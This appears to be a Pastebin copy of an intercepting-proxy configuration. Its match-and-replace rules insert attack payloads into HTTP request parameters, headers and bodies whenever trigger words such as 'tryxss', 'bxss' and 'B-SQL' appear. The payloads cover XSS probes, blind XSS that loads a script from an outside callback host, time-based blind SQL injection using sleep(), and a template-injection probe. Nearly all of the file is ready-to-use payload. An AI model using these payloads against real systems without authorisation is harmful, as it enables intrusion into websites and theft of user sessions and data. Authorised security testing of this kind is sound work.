Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- {
- "proxy": {
- "match_replace_rules": [
- {
- "comment": "FUZZ",
- "enabled": true,
- "is_simple_match": true,
- "rule_type": "request_param_value",
- "string_match": "FUZZ",
- "string_replace": "([^%22{%3C%27/\\`|%26`/\\%27%3E}%22^])"
- },
- {
- "comment": "FUZZ",
- "enabled": true,
- "is_simple_match": true,
- "rule_type": "request_header",
- "string_match": "FUZZ",
- "string_replace": "([^%22{%3C%27/\\`|%26`/\\%27%3E}%22^])"
- },
- {
- "comment": "FUZZ",
- "enabled": true,
- "is_simple_match": true,
- "rule_type": "request_body",
- "string_match": "FUZZ",
- "string_replace": "([^\"{<'/\\`|&`/\\'>}\"^])"
- },
- {
- "comment": "XSS/SQL",
- "enabled": true,
- "is_simple_match": true,
- "rule_type": "request_header",
- "string_match": "tryxss",
- "string_replace": "%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E"
- },
- {
- "comment": "XSS/SQL",
- "enabled": true,
- "is_simple_match": true,
- "rule_type": "request_body",
- "string_match": "tryxss",
- "string_replace": "'\"><img src=x onerror=alert(1)>"
- },
- {
- "comment": "XSS/SQL",
- "enabled": true,
- "is_simple_match": true,
- "rule_type": "request_param_value",
- "string_match": "tryxss",
- "string_replace": "%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E"
- },
- {
- "comment": "BLIND XSS",
- "enabled": true,
- "is_simple_match": true,
- "rule_type": "request_body",
- "string_match": "bxss",
- "string_replace": "'\"><script src=\"https://saharah4xor1.xss.ht/\"></script><h1>"
- },
- {
- "comment": "BLIN D XSS",
- "enabled": true,
- "is_simple_match": true,
- "rule_type": "request_param_value",
- "string_match": "bxss",
- "string_replace": "x%27%22%3E%3Cscript%20src=%22https://saharah4xor1.xss.ht/%22%3E%3C/script%3E"
- },
- {
- "comment": "BLIN D XSS",
- "enabled": true,
- "is_simple_match": true,
- "rule_type": "request_header",
- "string_match": "bxss",
- "string_replace": "x%27%22%3E%3Cscript%20src=%22https://saharah4xor1.xss.ht/%22%3E%3C/script%3E"
- },
- {
- "comment": "Blind SQL",
- "enabled": true,
- "is_simple_match": true,
- "rule_type": "request_header",
- "string_match": "B-SQL",
- "string_replace": "+(select(0)from(select(sleep(10)))v)/*'+(select(0)from(select(sleep(12)))v)+'\"+(select(0)from(select(sleep(10)))v)+\"*/"
- },
- {
- "comment": "Blind SQL",
- "enabled": true,
- "is_simple_match": true,
- "rule_type": "request_body",
- "string_match": "B-SQL",
- "string_replace": "if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'\"XOR(if(now()=sysdate(),sleep(9),0))OR\"*/"
- },
- {
- "comment": "Blind SQL",
- "enabled": true,
- "is_simple_match": true,
- "rule_type": "request_param_value",
- "string_match": "B-SQL",
- "string_replace": "if(now()=sysdate(),sleep(9),0)/*%27XOR(if(now()=sysdate(),sleep(9),0))OR%27\"XOR(if(now()=sysdate(),sleep(9),0))OR\"*/"
- },
- {
- "comment": "Mixed Bugs",
- "enabled": true,
- "is_simple_match": true,
- "rule_type": "request_header",
- "string_match": "mixedbugs",
- "string_replace": "%27%22%3E%3Csvg%2Fonload%3Dalert()%3E%7B%7B7*7%7D%7D"
- },
- {
- "comment": "Mixed Bugs",
- "enabled": true,
- "is_simple_match": true,
- "rule_type": "request_body",
- "string_match": "mixedbugs",
- "string_replace": "'\"><svg/onload=alert()>{{7*7}}"
- },
- {
- "comment": "Mixed Bugs",
- "enabled": true,
- "is_simple_match": true,
- "rule_type": "request_param_value",
- "string_match": "mixedbugs",
- "string_replace": "%27%22%3E%3Csvg%2Fonload%3Dalert()%3E%7B%7B7*7%7D%7D"
- }
- ]
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement